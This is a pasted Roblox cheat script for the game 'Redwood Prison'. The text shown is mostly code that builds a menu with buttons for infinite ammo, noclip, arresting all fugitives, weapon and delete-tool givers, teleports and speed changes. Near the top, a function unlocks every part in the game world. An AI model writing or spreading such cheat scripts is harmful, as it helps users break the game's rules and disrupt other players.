Guest User

roblox thing final

a guest
Sep 20th, 2019
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.38 KB | None | 0 0
  1. --[- Made By Xenode#0821 -]--
  2.  
  3. if game.PlaceId ~= 402122991 then return end
  4.  
  5. function unlockEverything(a)
  6. for n,o in pairs(a:GetChildren())do
  7. if(o:IsA("BasePart"))then o.Locked = false end
  8. unlockEverything(o)
  9. end
  10. end
  11.  
  12. unlockEverything(workspace)
  13.  
  14. RedwoodPrisonGUI = Instance.new("ScreenGui")
  15. main = Instance.new("Frame")
  16. topframe = Instance.new("Frame")
  17. name = Instance.new("TextLabel")
  18. close = Instance.new("TextButton")
  19. des = Instance.new("TextButton")
  20. choose = Instance.new("Frame")
  21. givers = Instance.new("TextButton")
  22. teleports = Instance.new("TextButton")
  23. misc = Instance.new("TextButton")
  24. home = Instance.new("TextButton")
  25. box = Instance.new("Frame")
  26. miscframe = Instance.new("Frame")
  27. reload = Instance.new("TextButton")
  28. arrest = Instance.new("TextButton")
  29. ammo = Instance.new("TextButton")
  30. walk = Instance.new("TextBox")
  31. changews = Instance.new("TextButton")
  32. noclip = Instance.new("TextButton")
  33. jump = Instance.new("TextBox")
  34. changejp = Instance.new("TextButton")
  35. teleportsframe = Instance.new("Frame")
  36. pris = Instance.new("TextButton")
  37. fug = Instance.new("TextButton")
  38. cops = Instance.new("TextButton")
  39. tp = Instance.new("TextButton")
  40. player = Instance.new("TextBox")
  41. giversframe = Instance.new("Frame")
  42. para = Instance.new("TextButton")
  43. guns = Instance.new("TextButton")
  44. id = Instance.new("TextButton")
  45. taser = Instance.new("TextButton")
  46. btools = Instance.new("TextButton")
  47. giver = Instance.new("TextButton")
  48. hammer = Instance.new("TextButton")
  49. homeframe = Instance.new("Frame")
  50. startedtext = Instance.new("TextLabel")
  51. namebold = Instance.new("TextLabel")
  52. welcometext = Instance.new("TextLabel")
  53. findtext = Instance.new("TextLabel")
  54. gungiver = Instance.new("Frame")
  55. m60 = Instance.new("TextButton")
  56. acr = Instance.new("TextButton")
  57. revo = Instance.new("TextButton")
  58. aku = Instance.new("TextButton")
  59. saw = Instance.new("TextButton")
  60. spas = Instance.new("TextButton")
  61. l86 = Instance.new("TextButton")
  62. ber = Instance.new("TextButton")
  63. m16 = Instance.new("TextButton")
  64. m98b = Instance.new("TextButton")
  65. ump = Instance.new("TextButton")
  66. m14 = Instance.new("TextButton")
  67. back = Instance.new("TextButton")
  68. open = Instance.new("TextButton")
  69.  
  70. RedwoodPrisonGUI.Name = "RedwoodPrisonGUI"
  71. RedwoodPrisonGUI.Parent = game.CoreGui
  72.  
  73. main.Name = "main"
  74. main.Parent = RedwoodPrisonGUI
  75. main.Active = true
  76. main.BackgroundColor3 = Color3.new(0.294118, 0.294118, 0.294118)
  77. main.BorderSizePixel = 0
  78. main.Position = UDim2.new(-0.285, 0,0.28, 0)
  79. main.Size = UDim2.new(0, 370, 0, 419)
  80. main.Visible = false
  81.  
  82. topframe.Name = "topframe"
  83. topframe.Parent = main
  84. topframe.Active = true
  85. topframe.BackgroundColor3 = Color3.new(0.541176, 0.541176, 0.541176)
  86. topframe.BorderSizePixel = 0
  87. topframe.Size = UDim2.new(0, 370, 0, 40)
  88.  
  89. name.Name = "name"
  90. name.Parent = topframe
  91. name.BackgroundColor3 = Color3.new(1, 1, 1)
  92. name.BackgroundTransparency = 1
  93. name.BorderSizePixel = 0
  94. name.Position = UDim2.new(0.261779487, 0, 0, 0)
  95. name.Size = UDim2.new(0, 188, 0, 40)
  96. name.Font = Enum.Font.SourceSansBold
  97. name.FontSize = Enum.FontSize.Size28
  98. name.Text = "Redwood Prison GUI"
  99. name.TextColor3 = Color3.new(1, 1, 1)
  100. name.TextSize = 26
  101.  
  102. close.Name = "close"
  103. close.Parent = topframe
  104. close.BackgroundColor3 = Color3.new(1, 1, 1)
  105. close.BackgroundTransparency = 1
  106. close.BorderSizePixel = 0
  107. close.Position = UDim2.new(0.937219977, 0, 0.121222615, 0)
  108. close.Size = UDim2.new(0, 23, 0, 29)
  109. close.Font = Enum.Font.SourceSansSemibold
  110. close.FontSize = Enum.FontSize.Size24
  111. close.Text = "X"
  112. close.TextColor3 = Color3.new(1, 1, 1)
  113. close.TextSize = 23
  114.  
  115. des.Name = "des"
  116. des.Parent = topframe
  117. des.BackgroundColor3 = Color3.new(1, 1, 1)
  118. des.BackgroundTransparency = 1
  119. des.BorderSizePixel = 0
  120. des.Position = UDim2.new(0, 0, -0.0249999762, 0)
  121. des.Size = UDim2.new(0, 38, 0, 35)
  122. des.Font = Enum.Font.SourceSansBold
  123. des.FontSize = Enum.FontSize.Size32
  124. des.Text = "V2"
  125. des.TextColor3 = Color3.new(1, 1, 1)
  126. des.TextSize = 30
  127.  
  128. choose.Name = "choose"
  129. choose.Parent = main
  130. choose.BackgroundColor3 = Color3.new(0.45098, 0.45098, 0.45098)
  131. choose.BorderSizePixel = 0
  132. choose.Position = UDim2.new(0, 0, 0.0954653919, 0)
  133. choose.Size = UDim2.new(0, 83, 0, 379)
  134.  
  135. givers.Name = "givers"
  136. givers.Parent = choose
  137. givers.BackgroundColor3 = Color3.new(1, 1, 1)
  138. givers.BackgroundTransparency = 1
  139. givers.BorderSizePixel = 0
  140. givers.Position = UDim2.new(0, 0, 0.562005222, 0)
  141. givers.Size = UDim2.new(0, 83, 0, 32)
  142. givers.Font = Enum.Font.SourceSansSemibold
  143. givers.FontSize = Enum.FontSize.Size24
  144. givers.Text = "Givers"
  145. givers.TextColor3 = Color3.new(1, 1, 1)
  146. givers.TextSize = 23
  147.  
  148. teleports.Name = "teleports"
  149. teleports.Parent = choose
  150. teleports.BackgroundColor3 = Color3.new(1, 1, 1)
  151. teleports.BackgroundTransparency = 1
  152. teleports.BorderSizePixel = 0
  153. teleports.Position = UDim2.new(0, 0, 0.337730885, 0)
  154. teleports.Size = UDim2.new(0, 83, 0, 32)
  155. teleports.Font = Enum.Font.SourceSansSemibold
  156. teleports.FontSize = Enum.FontSize.Size24
  157. teleports.Text = "Teleports"
  158. teleports.TextColor3 = Color3.new(1, 1, 1)
  159. teleports.TextSize = 23
  160.  
  161. misc.Name = "misc"
  162. misc.Parent = choose
  163. misc.BackgroundColor3 = Color3.new(1, 1, 1)
  164. misc.BackgroundTransparency = 1
  165. misc.BorderSizePixel = 0
  166. misc.Position = UDim2.new(0, 0, 0.781002641, 0)
  167. misc.Size = UDim2.new(0, 83, 0, 32)
  168. misc.Font = Enum.Font.SourceSansSemibold
  169. misc.FontSize = Enum.FontSize.Size24
  170. misc.Text = "Misc"
  171. misc.TextColor3 = Color3.new(1, 1, 1)
  172. misc.TextSize = 23
  173.  
  174. home.Name = "home"
  175. home.Parent = choose
  176. home.BackgroundColor3 = Color3.new(1, 1, 1)
  177. home.BackgroundTransparency = 1
  178. home.BorderSizePixel = 0
  179. home.Position = UDim2.new(0, 0, 0.110817954, 0)
  180. home.Size = UDim2.new(0, 83, 0, 32)
  181. home.Font = Enum.Font.SourceSansSemibold
  182. home.FontSize = Enum.FontSize.Size24
  183. home.Text = "Home"
  184. home.TextColor3 = Color3.new(1, 1, 1)
  185. home.TextSize = 23
  186.  
  187. box.Name = "box"
  188. box.Parent = main
  189. box.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255)
  190. box.BorderSizePixel = 0
  191. box.Position = UDim2.new(0.262162149, 0, 0.13126491, 0)
  192. box.Size = UDim2.new(0, 258, 0, 349)
  193.  
  194. miscframe.Name = "miscframe"
  195. miscframe.Parent = main
  196. miscframe.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726)
  197. miscframe.BackgroundTransparency = 1
  198. miscframe.BorderSizePixel = 0
  199. miscframe.Position = UDim2.new(0.224324331, 0, 0.0954653919, 0)
  200. miscframe.Size = UDim2.new(0, 287, 0, 379)
  201. miscframe.Visible = false
  202.  
  203. reload.Name = "reload"
  204. reload.Parent = miscframe
  205. reload.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  206. reload.BorderSizePixel = 0
  207. reload.Position = UDim2.new(0.244873911, 0, 0.318274647, 0)
  208. reload.Size = UDim2.new(0, 143, 0, 26)
  209. reload.Font = Enum.Font.SourceSansSemibold
  210. reload.FontSize = Enum.FontSize.Size24
  211. reload.Text = "F3x"
  212. reload.TextColor3 = Color3.new(1, 1, 1)
  213. reload.TextSize = 19
  214.  
  215. arrest.Name = "arrest"
  216. arrest.Parent = miscframe
  217. arrest.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  218. arrest.BorderSizePixel = 0
  219. arrest.Position = UDim2.new(0.247358173, 0, 0.0872581527, 0)
  220. arrest.Size = UDim2.new(0, 143, 0, 26)
  221. arrest.Font = Enum.Font.SourceSansSemibold
  222. arrest.FontSize = Enum.FontSize.Size24
  223. arrest.Text = "Arrest All Fugitives"
  224. arrest.TextColor3 = Color3.new(1, 1, 1)
  225. arrest.TextSize = 19
  226.  
  227. ammo.Name = "ammo"
  228. ammo.Parent = miscframe
  229. ammo.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  230. ammo.BorderSizePixel = 0
  231. ammo.Position = UDim2.new(0.246542901, 0, 0.204073444, 0)
  232. ammo.Size = UDim2.new(0, 143, 0, 26)
  233. ammo.Font = Enum.Font.SourceSansSemibold
  234. ammo.FontSize = Enum.FontSize.Size24
  235. ammo.Text = "Infinite Ammo"
  236. ammo.TextColor3 = Color3.new(1, 1, 1)
  237. ammo.TextSize = 19
  238. ammo.TextWrapped = true
  239.  
  240. walk.Name = "walk"
  241. walk.Parent = miscframe
  242. walk.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  243. walk.BorderSizePixel = 0
  244. walk.Position = UDim2.new(0.0696864128, 0, 0.622691333, 0)
  245. walk.Size = UDim2.new(0, 112, 0, 36)
  246. walk.Font = Enum.Font.SourceSansSemibold
  247. walk.FontSize = Enum.FontSize.Size24
  248. walk.Text = "WalkSpeed"
  249. walk.TextColor3 = Color3.new(1, 1, 1)
  250. walk.TextSize = 23
  251.  
  252. changews.Name = "changews"
  253. changews.Parent = miscframe
  254. changews.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  255. changews.BorderSizePixel = 0
  256. changews.Position = UDim2.new(0.087108016, 0, 0.751978934, 0)
  257. changews.Size = UDim2.new(0, 102, 0, 30)
  258. changews.Font = Enum.Font.SourceSansSemibold
  259. changews.FontSize = Enum.FontSize.Size24
  260. changews.Text = "Change"
  261. changews.TextColor3 = Color3.new(1, 1, 1)
  262. changews.TextSize = 20
  263.  
  264. noclip.Name = "noclip"
  265. noclip.Parent = miscframe
  266. noclip.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  267. noclip.BorderSizePixel = 0
  268. noclip.Position = UDim2.new(0.244873911, 0, 0.437008172, 0)
  269. noclip.Size = UDim2.new(0, 143, 0, 26)
  270. noclip.Font = Enum.Font.SourceSansSemibold
  271. noclip.FontSize = Enum.FontSize.Size24
  272. noclip.Text = "Enable NoClip"
  273. noclip.TextColor3 = Color3.new(1, 1, 1)
  274. noclip.TextSize = 19
  275.  
  276. jump.Name = "jump"
  277. jump.Parent = miscframe
  278. jump.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  279. jump.BorderSizePixel = 0
  280. jump.Position = UDim2.new(0.51219511, 0, 0.622691333, 0)
  281. jump.Size = UDim2.new(0, 112, 0, 36)
  282. jump.Font = Enum.Font.SourceSansSemibold
  283. jump.FontSize = Enum.FontSize.Size24
  284. jump.Text = "JumpPower"
  285. jump.TextColor3 = Color3.new(1, 1, 1)
  286. jump.TextSize = 23
  287.  
  288. changejp.Name = "changejp"
  289. changejp.Parent = miscframe
  290. changejp.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  291. changejp.BorderSizePixel = 0
  292. changejp.Position = UDim2.new(0.529616714, 0, 0.751978934, 0)
  293. changejp.Size = UDim2.new(0, 102, 0, 30)
  294. changejp.Font = Enum.Font.SourceSansSemibold
  295. changejp.FontSize = Enum.FontSize.Size24
  296. changejp.Text = "Change"
  297. changejp.TextColor3 = Color3.new(1, 1, 1)
  298. changejp.TextSize = 20
  299.  
  300. teleportsframe.Name = "teleportsframe"
  301. teleportsframe.Parent = main
  302. teleportsframe.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726)
  303. teleportsframe.BackgroundTransparency = 1
  304. teleportsframe.BorderSizePixel = 0
  305. teleportsframe.Position = UDim2.new(0.224324331, 0, 0.0954653919, 0)
  306. teleportsframe.Size = UDim2.new(0, 287, 0, 379)
  307. teleportsframe.Visible = false
  308.  
  309. pris.Name = "pris"
  310. pris.Parent = teleportsframe
  311. pris.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  312. pris.BorderSizePixel = 0
  313. pris.Position = UDim2.new(0.244873911, 0, 0.318274647, 0)
  314. pris.Size = UDim2.new(0, 143, 0, 26)
  315. pris.Font = Enum.Font.SourceSansSemibold
  316. pris.FontSize = Enum.FontSize.Size24
  317. pris.Text = "Teleport To Prison"
  318. pris.TextColor3 = Color3.new(1, 1, 1)
  319. pris.TextSize = 19
  320.  
  321. fug.Name = "fug"
  322. fug.Parent = teleportsframe
  323. fug.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  324. fug.BorderSizePixel = 0
  325. fug.Position = UDim2.new(0.247358173, 0, 0.0872581527, 0)
  326. fug.Size = UDim2.new(0, 143, 0, 26)
  327. fug.Font = Enum.Font.SourceSansSemibold
  328. fug.FontSize = Enum.FontSize.Size18
  329. fug.Text = "Teleport To Fugitives"
  330. fug.TextColor3 = Color3.new(1, 1, 1)
  331. fug.TextSize = 18
  332.  
  333. cops.Name = "cops"
  334. cops.Parent = teleportsframe
  335. cops.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  336. cops.BorderSizePixel = 0
  337. cops.Position = UDim2.new(0.246542901, 0, 0.204073444, 0)
  338. cops.Size = UDim2.new(0, 143, 0, 26)
  339. cops.Font = Enum.Font.SourceSansSemibold
  340. cops.FontSize = Enum.FontSize.Size24
  341. cops.Text = "Teleport To Cops"
  342. cops.TextColor3 = Color3.new(1, 1, 1)
  343. cops.TextSize = 19
  344. cops.TextWrapped = true
  345.  
  346. tp.Name = "tp"
  347. tp.Parent = teleportsframe
  348. tp.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  349. tp.BorderSizePixel = 0
  350. tp.Position = UDim2.new(0.311394662, 0, 0.716828048, 0)
  351. tp.Size = UDim2.new(0, 102, 0, 30)
  352. tp.Font = Enum.Font.SourceSansSemibold
  353. tp.FontSize = Enum.FontSize.Size24
  354. tp.Text = "Teleport"
  355. tp.TextColor3 = Color3.new(1, 1, 1)
  356. tp.TextSize = 20
  357.  
  358. player.Name = "player"
  359. player.Parent = teleportsframe
  360. player.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  361. player.BorderSizePixel = 0
  362. player.Position = UDim2.new(0.265185028, 0, 0.597055435, 0)
  363. player.Size = UDim2.new(0, 129, 0, 36)
  364. player.Font = Enum.Font.SourceSansSemibold
  365. player.FontSize = Enum.FontSize.Size24
  366. player.Text = "Player"
  367. player.TextColor3 = Color3.new(1, 1, 1)
  368. player.TextSize = 23
  369.  
  370. giversframe.Name = "giversframe"
  371. giversframe.Parent = main
  372. giversframe.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726)
  373. giversframe.BackgroundTransparency = 1
  374. giversframe.BorderSizePixel = 0
  375. giversframe.Position = UDim2.new(0.224324331, 0, 0.0954653919, 0)
  376. giversframe.Size = UDim2.new(0, 287, 0, 379)
  377. giversframe.Visible = false
  378.  
  379. para.Name = "para"
  380. para.Parent = giversframe
  381. para.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  382. para.BorderSizePixel = 0
  383. para.Position = UDim2.new(0.244873911, 0, 0.318274647, 0)
  384. para.Size = UDim2.new(0, 143, 0, 26)
  385. para.Font = Enum.Font.SourceSansSemibold
  386. para.FontSize = Enum.FontSize.Size24
  387. para.Text = "Pub Stomper"
  388. para.TextColor3 = Color3.new(1, 1, 1)
  389. para.TextSize = 19
  390.  
  391. guns.Name = "guns"
  392. guns.Parent = giversframe
  393. guns.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  394. guns.BorderSizePixel = 0
  395. guns.Position = UDim2.new(0.247358173, 0, 0.0872581527, 0)
  396. guns.Size = UDim2.new(0, 143, 0, 26)
  397. guns.Font = Enum.Font.SourceSansSemibold
  398. guns.FontSize = Enum.FontSize.Size24
  399. guns.Text = "Give All Guns"
  400. guns.TextColor3 = Color3.new(1, 1, 1)
  401. guns.TextSize = 19
  402.  
  403. id.Name = "id"
  404. id.Parent = giversframe
  405. id.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  406. id.BorderSizePixel = 0
  407. id.Position = UDim2.new(0.246542901, 0, 0.204073444, 0)
  408. id.Size = UDim2.new(0, 143, 0, 26)
  409. id.Font = Enum.Font.SourceSansSemibold
  410. id.FontSize = Enum.FontSize.Size24
  411. id.Text = "Cool UI"
  412. id.TextColor3 = Color3.new(1, 1, 1)
  413. id.TextSize = 19
  414. id.TextWrapped = true
  415.  
  416. taser.Name = "taser"
  417. taser.Parent = giversframe
  418. taser.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  419. taser.BorderSizePixel = 0
  420. taser.Position = UDim2.new(0.244873911, 0, 0.437008142, 0)
  421. taser.Size = UDim2.new(0, 143, 0, 26)
  422. taser.Font = Enum.Font.SourceSansSemibold
  423. taser.FontSize = Enum.FontSize.Size24
  424. taser.Text = "Give Bridge Tool"
  425. taser.TextColor3 = Color3.new(1, 1, 1)
  426. taser.TextSize = 19
  427.  
  428. btools.Name = "btools"
  429. btools.Parent = giversframe
  430. btools.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  431. btools.BorderSizePixel = 0
  432. btools.Position = UDim2.new(0.244873911, 0, 0.561018705, 0)
  433. btools.Size = UDim2.new(0, 143, 0, 26)
  434. btools.Font = Enum.Font.SourceSansSemibold
  435. btools.FontSize = Enum.FontSize.Size24
  436. btools.Text = "Give Delete Tool"
  437. btools.TextColor3 = Color3.new(1, 1, 1)
  438. btools.TextSize = 19
  439.  
  440. giver.Name = "giver"
  441. giver.Parent = giversframe
  442. giver.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  443. giver.BorderSizePixel = 0
  444. giver.Position = UDim2.new(0.240418121, 0, 0.815303445, 0)
  445. giver.Size = UDim2.new(0, 144, 0, 33)
  446. giver.Font = Enum.Font.SourceSansSemibold
  447. giver.FontSize = Enum.FontSize.Size24
  448. giver.Text = "Gun Giver"
  449. giver.TextColor3 = Color3.new(1, 1, 1)
  450. giver.TextSize = 20
  451.  
  452. hammer.Name = "hammer"
  453. hammer.Parent = giversframe
  454. hammer.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  455. hammer.BorderSizePixel = 0
  456. hammer.Position = UDim2.new(0.248358235, 0, 0.690306306, 0)
  457. hammer.Size = UDim2.new(0, 143, 0, 26)
  458. hammer.Font = Enum.Font.SourceSansSemibold
  459. hammer.FontSize = Enum.FontSize.Size24
  460. hammer.Text = "Give Hammer&Shank"
  461. hammer.TextColor3 = Color3.new(1, 1, 1)
  462. hammer.TextSize = 19
  463.  
  464. homeframe.Name = "homeframe"
  465. homeframe.Parent = main
  466. homeframe.BackgroundColor3 = Color3.new(0.239216, 0.239216, 0.239216)
  467. homeframe.BackgroundTransparency = 1
  468. homeframe.BorderSizePixel = 0
  469. homeframe.Position = UDim2.new(0.224324346, 0, 0.0954653919, 0)
  470. homeframe.Size = UDim2.new(0, 287, 0, 379)
  471.  
  472. startedtext.Name = "startedtext"
  473. startedtext.Parent = homeframe
  474. startedtext.BackgroundColor3 = Color3.new(1, 1, 1)
  475. startedtext.BackgroundTransparency = 1
  476. startedtext.BorderSizePixel = 0
  477. startedtext.Position = UDim2.new(0.16551806, 0, 0.198821187, 0)
  478. startedtext.Size = UDim2.new(0, 188, 0, 40)
  479. startedtext.Font = Enum.Font.SourceSansSemibold
  480. startedtext.FontSize = Enum.FontSize.Size24
  481. startedtext.Text = "oodfty x ogredale"
  482. startedtext.TextColor3 = Color3.new(1, 1, 1)
  483. startedtext.TextSize = 20
  484.  
  485. namebold.Name = "namebold"
  486. namebold.Parent = homeframe
  487. namebold.BackgroundColor3 = Color3.new(1, 1, 1)
  488. namebold.BackgroundTransparency = 1
  489. namebold.BorderSizePixel = 0
  490. namebold.Position = UDim2.new(0.165900752, 0, 0.0842626989, 0)
  491. namebold.Size = UDim2.new(0, 188, 0, 48)
  492. namebold.Font = Enum.Font.SourceSansBold
  493. namebold.FontSize = Enum.FontSize.Size28
  494. namebold.Text = "Redwood Prison GUI!"
  495. namebold.TextColor3 = Color3.new(1, 1, 1)
  496. namebold.TextSize = 26
  497.  
  498. welcometext.Name = "welcometext"
  499. welcometext.Parent = homeframe
  500. welcometext.BackgroundColor3 = Color3.new(1, 1, 1)
  501. welcometext.BackgroundTransparency = 1
  502. welcometext.BorderSizePixel = 0
  503. welcometext.Position = UDim2.new(0.16551806, 0, 0.0389166288, 0)
  504. welcometext.Size = UDim2.new(0, 188, 0, 40)
  505. welcometext.Font = Enum.Font.SourceSansSemibold
  506. welcometext.FontSize = Enum.FontSize.Size28
  507. welcometext.Text = "Welcome to "
  508. welcometext.TextColor3 = Color3.new(1, 1, 1)
  509. welcometext.TextSize = 27
  510.  
  511. findtext.Name = "findtext"
  512. findtext.Parent = homeframe
  513. findtext.BackgroundColor3 = Color3.new(1, 1, 1)
  514. findtext.BackgroundTransparency = 1
  515. findtext.BorderSizePixel = 0
  516. findtext.Position = UDim2.new(0.16551806, 0, 0.256100416, 0)
  517. findtext.Size = UDim2.new(0, 188, 0, 40)
  518. findtext.Font = Enum.Font.SourceSansSemibold
  519. findtext.FontSize = Enum.FontSize.Size24
  520. findtext.Text = "luv u <3"
  521. findtext.TextColor3 = Color3.new(1, 1, 1)
  522. findtext.TextSize = 20
  523.  
  524. gungiver.Name = "gungiver"
  525. gungiver.Parent = main
  526. gungiver.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726)
  527. gungiver.BackgroundTransparency = 1
  528. gungiver.BorderSizePixel = 0
  529. gungiver.Position = UDim2.new(0.225652158, 0, 0.0959439874, 0)
  530. gungiver.Size = UDim2.new(0, 287, 0, 379)
  531. gungiver.Visible = false
  532.  
  533. m60.Name = "m60"
  534. m60.Parent = gungiver
  535. m60.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  536. m60.BorderSizePixel = 0
  537. m60.Position = UDim2.new(0.0696864128, 0, 0.0870712399, 0)
  538. m60.Size = UDim2.new(0, 93, 0, 26)
  539. m60.Font = Enum.Font.SourceSansSemibold
  540. m60.FontSize = Enum.FontSize.Size24
  541. m60.Text = "M60"
  542. m60.TextColor3 = Color3.new(1, 1, 1)
  543. m60.TextSize = 19
  544.  
  545. acr.Name = "acr"
  546. acr.Parent = gungiver
  547. acr.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  548. acr.BorderSizePixel = 0
  549. acr.Position = UDim2.new(0.0696864128, 0, 0.319261193, 0)
  550. acr.Size = UDim2.new(0, 93, 0, 26)
  551. acr.Font = Enum.Font.SourceSansSemibold
  552. acr.FontSize = Enum.FontSize.Size24
  553. acr.Text = "ACR"
  554. acr.TextColor3 = Color3.new(1, 1, 1)
  555. acr.TextSize = 19
  556.  
  557. revo.Name = "revo"
  558. revo.Parent = gungiver
  559. revo.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  560. revo.BorderSizePixel = 0
  561. revo.Position = UDim2.new(0.595818818, 0, 0.319261193, 0)
  562. revo.Size = UDim2.new(0, 93, 0, 26)
  563. revo.Font = Enum.Font.SourceSansSemibold
  564. revo.FontSize = Enum.FontSize.Size24
  565. revo.Text = "Revolver"
  566. revo.TextColor3 = Color3.new(1, 1, 1)
  567. revo.TextSize = 19
  568.  
  569. aku.Name = "aku"
  570. aku.Parent = gungiver
  571. aku.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  572. aku.BorderSizePixel = 0
  573. aku.Position = UDim2.new(0.0696864128, 0, 0.437994719, 0)
  574. aku.Size = UDim2.new(0, 93, 0, 26)
  575. aku.Font = Enum.Font.SourceSansSemibold
  576. aku.FontSize = Enum.FontSize.Size24
  577. aku.Text = "AK47-U"
  578. aku.TextColor3 = Color3.new(1, 1, 1)
  579. aku.TextSize = 19
  580.  
  581. saw.Name = "saw"
  582. saw.Parent = gungiver
  583. saw.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  584. saw.BorderSizePixel = 0
  585. saw.Position = UDim2.new(0.0696864128, 0, 0.562005281, 0)
  586. saw.Size = UDim2.new(0, 93, 0, 26)
  587. saw.Font = Enum.Font.SourceSansSemibold
  588. saw.FontSize = Enum.FontSize.Size24
  589. saw.Text = "S&W 638"
  590. saw.TextColor3 = Color3.new(1, 1, 1)
  591. saw.TextSize = 19
  592.  
  593. spas.Name = "spas"
  594. spas.Parent = gungiver
  595. spas.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  596. spas.BorderSizePixel = 0
  597. spas.Position = UDim2.new(0.595818818, 0, 0.562005281, 0)
  598. spas.Size = UDim2.new(0, 93, 0, 26)
  599. spas.Font = Enum.Font.SourceSansSemibold
  600. spas.FontSize = Enum.FontSize.Size24
  601. spas.Text = "SPAS-12"
  602. spas.TextColor3 = Color3.new(1, 1, 1)
  603. spas.TextSize = 19
  604.  
  605. l86.Name = "l86"
  606. l86.Parent = gungiver
  607. l86.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  608. l86.BorderSizePixel = 0
  609. l86.Position = UDim2.new(0.595818818, 0, 0.437994719, 0)
  610. l86.Size = UDim2.new(0, 93, 0, 26)
  611. l86.Font = Enum.Font.SourceSansSemibold
  612. l86.FontSize = Enum.FontSize.Size24
  613. l86.Text = "L86A2"
  614. l86.TextColor3 = Color3.new(1, 1, 1)
  615. l86.TextSize = 19
  616.  
  617. ber.Name = "ber"
  618. ber.Parent = gungiver
  619. ber.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  620. ber.BorderSizePixel = 0
  621. ber.Position = UDim2.new(0.595818818, 0, 0.678100228, 0)
  622. ber.Size = UDim2.new(0, 93, 0, 26)
  623. ber.Font = Enum.Font.SourceSansSemibold
  624. ber.FontSize = Enum.FontSize.Size24
  625. ber.Text = "Fake ID"
  626. ber.TextColor3 = Color3.new(1, 1, 1)
  627. ber.TextSize = 19
  628.  
  629. m16.Name = "m16"
  630. m16.Parent = gungiver
  631. m16.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  632. m16.BorderSizePixel = 0
  633. m16.Position = UDim2.new(0.0696864128, 0, 0.678100228, 0)
  634. m16.Size = UDim2.new(0, 93, 0, 26)
  635. m16.Font = Enum.Font.SourceSansSemibold
  636. m16.FontSize = Enum.FontSize.Size24
  637. m16.Text = "M16"
  638. m16.TextColor3 = Color3.new(1, 1, 1)
  639. m16.TextSize = 19
  640.  
  641. m98b.Name = "m98b"
  642. m98b.Parent = gungiver
  643. m98b.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  644. m98b.BorderSizePixel = 0
  645. m98b.Position = UDim2.new(0.595818818, 0, 0.0870712399, 0)
  646. m98b.Size = UDim2.new(0, 93, 0, 26)
  647. m98b.Font = Enum.Font.SourceSansSemibold
  648. m98b.FontSize = Enum.FontSize.Size24
  649. m98b.Text = "M98B"
  650. m98b.TextColor3 = Color3.new(1, 1, 1)
  651. m98b.TextSize = 19
  652.  
  653. ump.Name = "ump"
  654. ump.Parent = gungiver
  655. ump.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  656. ump.BorderSizePixel = 0
  657. ump.Position = UDim2.new(0.0696864128, 0, 0.203166217, 0)
  658. ump.Size = UDim2.new(0, 93, 0, 26)
  659. ump.Font = Enum.Font.SourceSansSemibold
  660. ump.FontSize = Enum.FontSize.Size24
  661. ump.Text = "UMP-45"
  662. ump.TextColor3 = Color3.new(1, 1, 1)
  663. ump.TextSize = 19
  664.  
  665. m14.Name = "m14"
  666. m14.Parent = gungiver
  667. m14.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  668. m14.BorderSizePixel = 0
  669. m14.Position = UDim2.new(0.595818818, 0, 0.203166217, 0)
  670. m14.Size = UDim2.new(0, 93, 0, 26)
  671. m14.Font = Enum.Font.SourceSansSemibold
  672. m14.FontSize = Enum.FontSize.Size24
  673. m14.Text = "M14"
  674. m14.TextColor3 = Color3.new(1, 1, 1)
  675. m14.TextSize = 19
  676.  
  677. back.Name = "back"
  678. back.Parent = gungiver
  679. back.BackgroundColor3 = Color3.new(0.439216, 0.439216, 0.439216)
  680. back.BorderSizePixel = 0
  681. back.Position = UDim2.new(0.048780486, 0, 0.89182055, 0)
  682. back.Size = UDim2.new(0, 67, 0, 26)
  683. back.Font = Enum.Font.SourceSansSemibold
  684. back.FontSize = Enum.FontSize.Size24
  685. back.Text = "Back"
  686. back.TextColor3 = Color3.new(1, 1, 1)
  687. back.TextSize = 19
  688.  
  689. open.Name = "open"
  690. open.Parent = RedwoodPrisonGUI
  691. open.Active = false
  692. open.BackgroundColor3 = Color3.new(0.407843, 0.407843, 0.407843)
  693. open.BorderSizePixel = 0
  694. open.Position = UDim2.new(-0.284999996, 0, 0.675000012, 0)
  695. open.Size = UDim2.new(0, 77, 0, 33)
